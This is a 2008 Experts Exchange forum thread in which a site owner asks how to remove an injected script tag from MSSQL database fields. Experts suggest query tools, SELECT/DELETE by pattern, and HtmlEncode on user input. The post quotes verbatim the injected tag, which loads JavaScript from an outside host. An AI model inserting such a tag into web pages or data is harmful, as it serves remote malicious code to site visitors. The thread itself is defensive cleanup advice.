Solved

Need to remove an 'unauthorized' script from database fields - help/suggestions

Posted on 2008-06-16
12
447 Views
Last Modified: 2013-11-15
Here's the deal, som jerk-offs infiltrated my website database with this:

<script src=http://www.clsidw.com/b.js></script>

They were able to insert this into some of the fields in my database, and my most recent backup was done after they did it, so I can't go back. Now, I need to get into the database and erase this entry in whatever fields they got into.

1 What is the fastest way to accomplish this?

2 What database software should I use keeping in mind I probably will never use it again, so cost IS a consideration.

3 Is there a way to clear this automatically or in a batch?

FWIW, they DID NOT overwrite the fields, they simply ADDED this to them.
0
Comment
Question by:bishopandsix
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 6
  • 5
12 Comments
 
LVL 25

Expert Comment

by:Tomas Helgi Johannsson
ID: 21798262
        HI!

Have you tried Toad for MySQL (www.toadsoft.com) ?
It's free and very good DBA tool to make changes to your database.

What you can do is do an update on each table by and put a empty string in stead of the script string for fields that are
just chars / varchars.
With text fields (TEXT, MEDIUM TEXT, LONG TEXT) or BLOB fields  it might be a little more trickier.
What you can do is use mysqldump to dump the database(s) to an sql file and use
texteditor (like WordPad/Notepad if you use WIndows) to search and replace the script text with blanks
and then restore the database with the altered backup sql file.
See the manual for further info
http://dev.mysql.com/doc/refman/5.0/en/mysqldump.html

Regards,
   Tomas Helgi
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21798294
this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'


0
 

Author Comment

by:bishopandsix
ID: 21798300
I'm sorry, I think my Database is MS SQL, does Toad work with that? I am a complete beginner when it comes to database stuff.
0
NEW Veeam Agent for Microsoft Windows

Backup and recover physical and cloud-based servers and workstations, as well as endpoint devices that belong to remote users. Avoid downtime and data loss quickly and easily for Windows-based physical or public cloud-based workloads!

 
LVL 7

Expert Comment

by:Zippit
ID: 21798303
If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)
0
 

Author Comment

by:bishopandsix
ID: 21798370
"this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'"

If I do this, will it eliminate ONLY the added script, or will it eliminate everything in the field? Also, what software should I use to do this with?
0
 

Author Comment

by:bishopandsix
ID: 21798392
"If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly.
0
 
LVL 7

Accepted Solution

by:
Zippit earned 500 total points
ID: 21798790
The delete will delete all data in the entire affected record.  If the malicious script tag is in a comment you probably want to do that anyway.  If you just want to remove the "script" tag then you are going to need to write a program/script to loop through all your records and update the field with the value with the malicious script tag removed.

If you want to see what records will be deleted run the following:

SELECT *
FROM  tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'

You will need a query tool to run this against.  If you are using MSSQL then use either Query Analyzer or SQL Server Management Studio (they come with SQL Server Standard or Enterprise).
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21798801

userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly.

"YOU" can as the administrator.  But if you put that code in your comments submission code (or wherever the user's submitted the malicious script tags) then they will no longer be able to use HTML of any kind.

If you want them to be able to continue using HTML then you will have to write a "smart" filter that strips out possibly malicious tags like <script>.  But that's easier said then done.
0
 

Author Comment

by:bishopandsix
ID: 21799232
Still need some help with what software to use to accomplish the database cleaning. The database is MSSQL as far as I know.
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21807259
what product are you using for your site?  If it's open source I will take a look for the schema and might be able to whip something up real quick.

Is the site hosted on your server or are you renting server space/web space?
0
 

Author Comment

by:bishopandsix
ID: 21808309
Absolutely no  idea what product. I'll get with my host in the morning and ask.
0
 

Author Closing Comment

by:bishopandsix
ID: 31467804
Thanks, your help got me going in the right direction and I was able to clean the records with only a slight amount of additional info I found by doing some Google searches.
0

Featured Post

Space-Age Communications Transitions to DevOps

ViaSat, a global provider of satellite and wireless communications, securely connects businesses, governments, and organizations to the Internet. Learn how ViaSat’s Network Solutions Engineer, drove the transition from a traditional network support to a DevOps-centric model.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Many companies are looking to get out of the datacenter business and to services like Microsoft Azure to provide Infrastructure as a Service (IaaS) solutions for legacy client server workloads, rather than continuing to make capital investments in h…
This article shows gives you an overview on SQL Server 2016 row level security. You will also get to know the usages of row-level-security and how it works
Via a live example, show how to setup several different housekeeping processes for a SQL Server.
Viewers will learn how to use the UPDATE and DELETE statements to change or remove existing data from their tables. Make a table: Update a specific column given a specific row using the UPDATE statement: Remove a set of values using the DELETE s…

733 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question